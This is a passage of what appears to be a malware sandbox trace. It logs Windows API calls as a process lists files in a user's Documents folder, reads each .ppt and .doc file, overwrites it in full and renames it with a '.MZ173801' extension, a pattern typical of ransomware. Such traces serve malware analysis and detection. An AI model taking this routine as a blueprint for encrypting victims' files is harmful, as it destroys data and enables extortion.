kJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.125] GetCurrentThreadId () returned 0x1358 [0122.125] GetCurrentThreadId () returned 0x1358 [0122.125] GetCurrentThreadId () returned 0x1358 [0122.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\dMoow7sypidEXF.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\dmoow7sypidexf.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.125] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.125] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.125] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x156d0 [0122.125] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.125] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x156d0, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x156d0, lpOverlapped=0x0) returned 1 [0122.126] CloseHandle (hObject=0x408) returned 1 [0122.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\dMoow7sypidEXF.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\dmoow7sypidexf.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.129] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x156d0, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x156d0, lpOverlapped=0x0) returned 1 [0122.131] CloseHandle (hObject=0x408) returned 1 [0122.183] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\dMoow7sypidEXF.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\dmoow7sypidexf.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\dMoow7sypidEXF.ppt.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\dmoow7sypidexf.ppt.mz173801")) returned 1 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] GetCurrentThreadId () returned 0x1358 [0122.184] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02b2f0, ftCreationTime.dwHighDateTime=0x1d5e105, ftLastAccessTime.dwLowDateTime=0xe3f51e80, ftLastAccessTime.dwHighDateTime=0x1d5e908, ftLastWriteTime.dwLowDateTime=0xe3f51e80, ftLastWriteTime.dwHighDateTime=0x1d5e908, nFileSizeHigh=0x0, nFileSizeLow=0x98f8, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Lk3TDwyaU3iymmdwQ.ods", cAlternateFileName="LK3TDW~1.ODS")) returned 1 [0122.184] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.184] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.184] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6c31dc0, ftCreationTime.dwHighDateTime=0x1d5e13b, ftLastAccessTime.dwLowDateTime=0xf7f1d030, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0xf7f1d030, ftLastWriteTime.dwHighDateTime=0x1d5e882, nFileSizeHigh=0x0, nFileSizeLow=0xaccf, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="maQtnjtEPvgXKVh_.doc", cAlternateFileName="MAQTNJ~1.DOC")) returned 1 [0122.184] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.184] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\maQtnjtEPvgXKVh_.doc" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\maqtnjtepvgxkvh_.doc"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6c31dc0, ftCreationTime.dwHighDateTime=0x1d5e13b, ftLastAccessTime.dwLowDateTime=0xf7f1d030, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0xf7f1d030, ftLastWriteTime.dwHighDateTime=0x1d5e882, nFileSizeHigh=0x0, nFileSizeLow=0xaccf)) returned 1 [0122.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.185] GetCurrentThreadId () returned 0x1358 [0122.185] GetCurrentThreadId () returned 0x1358 [0122.185] GetCurrentThreadId () returned 0x1358 [0122.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.186] GetCurrentThreadId () returned 0x1358 [0122.186] GetCurrentThreadId () returned 0x1358 [0122.186] GetCurrentThreadId () returned 0x1358 [0122.186] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\maQtnjtEPvgXKVh_.doc" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\maqtnjtepvgxkvh_.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.186] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.186] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.186] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xaccf [0122.186] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.186] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xaccf, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xaccf, lpOverlapped=0x0) returned 1 [0122.187] CloseHandle (hObject=0x408) returned 1 [0122.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\maQtnjtEPvgXKVh_.doc" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\maqtnjtepvgxkvh_.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.189] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xaccf, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xaccf, lpOverlapped=0x0) returned 1 [0122.193] CloseHandle (hObject=0x408) returned 1 [0122.199] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\maQtnjtEPvgXKVh_.doc" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\maqtnjtepvgxkvh_.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\maQtnjtEPvgXKVh_.doc.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\maqtnjtepvgxkvh_.doc.mz173801")) returned 1 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] GetCurrentThreadId () returned 0x1358 [0122.200] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637ef250, ftCreationTime.dwHighDateTime=0x1d5e168, ftLastAccessTime.dwLowDateTime=0x2cd726a0, ftLastAccessTime.dwHighDateTime=0x1d5e86b, ftLastWriteTime.dwLowDateTime=0x2cd726a0, ftLastWriteTime.dwHighDateTime=0x1d5e86b, nFileSizeHigh=0x0, nFileSizeLow=0x13909, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="nZr6PHEvCUKrD5BUDBLc.rtf", cAlternateFileName="NZR6PH~1.RTF")) returned 1 [0122.200] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.200] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\nZr6PHEvCUKrD5BUDBLc.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\nzr6phevcukrd5budblc.rtf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637ef250, ftCreationTime.dwHighDateTime=0x1d5e168, ftLastAccessTime.dwLowDateTime=0x2cd726a0, ftLastAccessTime.dwHighDateTime=0x1d5e86b, ftLastWriteTime.dwLowDateTime=0x2cd726a0, ftLastWriteTime.dwHighDateTime=0x1d5e86b, nFileSizeHigh=0x0, nFileSizeLow=0x13909)) returned 1 [0122.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 